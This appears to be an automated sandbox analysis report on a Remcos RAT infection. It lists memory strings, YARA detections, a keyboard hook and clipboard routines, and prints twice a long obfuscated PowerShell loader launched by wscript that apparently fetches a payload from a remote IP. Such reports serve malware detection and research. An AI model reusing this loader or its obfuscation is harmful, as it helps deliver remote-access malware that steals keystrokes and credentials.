                Source: wscript.exe, 00000000.00000003.2091024269.00000222CB582000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090012949.00000222CB55B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?df83351815
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, bhvEF08.tmp.14.drString found in binary or memory: http://geoplugin.net/json.gp
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpM
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpa
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpf
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpm
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gprv
                Source: powershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0Q
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: wab.exe, wab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: wab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
                Source: wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: wab.exe, 0000000E.00000002.2604949604.0000000002DA4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2570518162.000002848DF0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: powershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhvEF08.tmp.14.drString found in binary or memory: https://www.office.com/

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041183A OpenClipboard,GetLastError,DeleteFileW,14_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004098E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_004072B5

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_5512.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Very long command line found
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9716
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9716
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9716Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9716Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00401806 NtdllDefWindowProc_W,14_2_00401806
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004018C0 NtdllDefWindowProc_W,14_2_004018C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004016FD NtdllDefWindowProc_A,15_2_004016FD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004017B7 NtdllDefWindowProc_A,15_2_004017B7
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00402CAC NtdllDefWindowProc_A,16_2_00402CAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00402D66 NtdllDefWindowProc_A,16_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346FB0F62_2_00007FFD346FB0F6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346F4A0A2_2_00007FFD346F4A0A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346FBEA22_2_00007FFD346FBEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346F44E02_2_00007FFD346F44E0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346F3E332_2_00007FFD346F3E33
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346F16C92_2_00007FFD346F16C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346F6E6D2_2_00007FFD346F6E6D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346F7AFA2_2_00007FFD346F7AFA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346F6BF32_2_00007FFD346F6BF3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347C088D2_2_00007FFD347C088D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04EAF1F05_2_04EAF1F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04EAFAC05_2_04EAFAC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04EAEEA85_2_04EAEEA8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137719410_2_21377194
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136B5C110_2_2136B5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044B04014_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043610D14_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044731014_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A49014_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040755A14_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043C56014_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044B61014_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044D6C014_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004476F014_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044B87014_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044081D14_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041495714_2_00414957
